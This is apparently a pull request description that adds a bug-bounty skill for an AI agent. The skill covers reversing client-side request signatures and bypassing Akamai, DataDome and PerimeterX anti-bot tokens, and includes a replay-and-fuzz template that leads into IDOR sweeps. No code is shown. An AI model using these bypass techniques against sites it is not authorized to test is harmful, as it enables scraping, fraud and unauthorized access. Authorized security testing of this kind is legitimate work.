feat(skills): add client-reverse skill (request-signing / anti-bot token reversal)

[letztek]

What

Adds a new focused skill skills/client-reverse/SKILL.md (plus one reference doc references/browser-js-signing.md) covering client-side request-signing and anti-bot token reversal for bug bounty — the case where a sign/sig/X-Signature/nonce/X-Sensor-Data/encrypted-body field stops you from replaying a request in Burp/mitmproxy.

Core methodology is packet-first staging: capture the real request → prove replay works unchanged → only reverse the signer if replay actually fails. Walks the locate → recover → runtime → validation → replay spine, teaching:

• tracing backward from the signature field (writer ← builder ← entry ← source)
• isolating which sign inputs are user-mutable (timestamp/nonce/deviceId/body) vs constant (secret key) — the decision that determines whether replay is even possible
• hooking fetch/XHR and the signer in Chrome DevTools (XHR/fetch breakpoints, console method override, {} pretty-print + global search)
• deobfuscation basics (webpack/wasm/JSVMP) with a strong bias toward the black-box "reuse the page's signer / log sign(input)→output" shortcut over decompiling crypto
• anti-bot tokens (Akamai/DataDome/PerimeterX) via token reuse / headless bridge, with the explicit note that full SDK reversal is out of scope for a single bounty
• a Python replay+fuzz template that pivots straight into an IDOR sweep

Uses standard CLI tooling only (Chrome DevTools, Burp, mitmproxy, Python requests, Selenium/Playwright, and apktool/jadx/objection/frida CLI for the mobile variant) — no new MCP dependency.

Why

Nothing in the current skill set covers reaching an API that's gated by a client-computed signature, despite this being a common wall on high-value targets. The bounty framing is explicit throughout — the signing weakness alone is N/A; the payoff is the IDOR / Broken Auth / Mass Assignment / Business Logic bug you reach through it, cross-referenced to web2-vuln-classes and web2-recon. Includes a "what's submittable vs N/A" verdict table to keep hunters from reporting "I reversed your algorithm" as a finding.

References

Grounded against current web research, with only verifiable disclosures cited:

• the CoinMate HackerOne disclosure (HMAC signature omits endpoint/payload → request forgery)
• HMAC-header replay-window patterns
• Akamai v3 sensor-data internals
• the PerimeterX iOS SDK reversal write-up

No dollar figures or CVEs were invented — only verifiable disclosures are cited, and patterns without a confirmed payout are labeled as patterns.

Merge order

Net-new skill directory; does not modify web2-vuln-classes or any existing file. Adds a row to the CLAUDE.md skills table. No conflicts expected.